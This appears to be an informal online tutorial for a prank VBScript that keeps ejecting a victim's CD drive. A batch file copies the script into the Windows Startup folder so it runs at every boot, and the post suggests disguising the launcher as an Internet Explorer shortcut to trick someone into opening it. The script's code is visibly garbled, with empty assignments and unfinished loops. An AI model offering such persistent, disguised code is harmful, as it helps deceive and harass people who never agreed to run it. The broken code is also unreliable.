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i will show you a basic VBS script that opens a cd drive every time found
closed( How hard u may try but CD ROM will never be closed until u restart
yr computer ). so ultimately always opens CD drive till closed just copy
paste this code into Notepad (any basic ANSI standard text editor) and
save as CDfun.vbs and dont forget the .vbs part
set wmp =
set drives =
sub open_saysame()
on error
resume next
if drives.count > = 1
for i = 0 to drives.count -
end sub
now this is funny but what if it was even funnier.
what if every time you started you r computer it loaded? that could make
it even better... so open a new notepad document (blank) and insert this
code into it NOTE: numbered to show which line it
1:)copy CDfun.vbs "c:\Documents and
Settings\%username%\Start Menu\Programs\Startup\"
Save this as run.bat, now comes the fun part. all you
need to do is get them to somehow open this run.bat. there are many ways.
one way is to make a shortcut to it called "internet Explorer" and right
click to change properties on icon. that way it will look just like
Internet Explorer.